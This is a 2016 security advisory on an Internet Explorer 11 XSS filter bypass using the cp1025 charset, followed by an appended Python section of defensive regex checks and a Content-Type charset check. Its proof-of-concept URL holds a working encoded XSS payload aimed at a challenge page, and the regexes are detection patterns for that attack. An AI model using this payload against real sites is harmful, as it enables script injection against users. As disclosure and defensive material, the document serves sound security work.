Microsoft Internet Explorer 11 XSS Filter Bypass
Posted on 13 June 2016
#Vulnerability: IE 11 XSS Filter Bypass
#Impact: Moderate
#Authors: Rafay Baloch
#Company: RHAInfoSec
#Website: http://rafayhackingarticles.net
#Version: Latest

Description

Internet Explorer 11 suffers from an XSS filter bypass using the cp1025 charset. This is highly effective when the charset has not been set by the webmaster. The issue occurs because the filter's regular expressions try to match "http-equiv" instead of filtering out the "<meta charset" keyword.

Proof of Concept

The following is the proof of concept:

http://challenge.hackvertor.co.uk/xss.php?x=%3Cmeta%20charset=cp1025%3E%27%20L%C9%86%D9%81%D4%85%40%C9%84~[%40%D6%95%D4%96%E4%A2%85%D6%A5%C5%99~m~%60JZ^NNm^mm~mNm^mmmm~mmNmm^mmmmmm~mmmmNmm^[JMOO}}N}}]JmZNMOO}}N}}]JmmZNMOO}}N}}]JmmmmZNMO}}N}}]JmZNM[N}}]JmmmmmmZZMm]n
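The two defender-side checks the description implies, as an added example that is not part of the original advisory or of the IE 11 filter: a regex that only looks for "http-equiv" (the pattern the text criticises) beside one that also matches a bare "charset" attribute, plus a check that a response declares its charset explicitly in Content-Type, which is the condition under which an injected meta charset has no effect. Pattern names, the header-dictionary shape and the sample fragments are constructed for illustration.

```python
import re

# Weak pattern of the kind the advisory describes: it only recognises
# the http-equiv form of a charset declaration inside a <meta> tag.
WEAK_META_RE = re.compile(r"<meta[^>]*http-equiv", re.IGNORECASE)

# Hardened pattern (constructed here): any <meta> tag carrying either a
# charset= attribute or an http-equiv declaration.
HARDENED_META_RE = re.compile(
    r"<meta[^>]*(?:\bcharset\s*=|http-equiv)", re.IGNORECASE)


def weak_filter_flags(fragment: str) -> bool:
    """True if the http-equiv-only pattern would block this fragment."""
    return bool(WEAK_META_RE.search(fragment))


def hardened_filter_flags(fragment: str) -> bool:
    """True if the pattern that also covers <meta charset=...> blocks it."""
    return bool(HARDENED_META_RE.search(fragment))


def response_declares_charset(headers: dict) -> bool:
    """True if the Content-Type header (any key casing) names a charset.

    When the server declares the charset, a <meta charset> tag injected
    into the body cannot switch the document's encoding.
    """
    ctype = next(
        (v for k, v in headers.items() if k.lower() == "content-type"), "")
    return re.search(
        r";\s*charset\s*=\s*[\w-]+", ctype, re.IGNORECASE) is not None
```

Regex matching of markup stays brittle regardless of the pattern, so the header check is the one to rely on; the pattern comparison only shows why "http-equiv" alone is the wrong anchor.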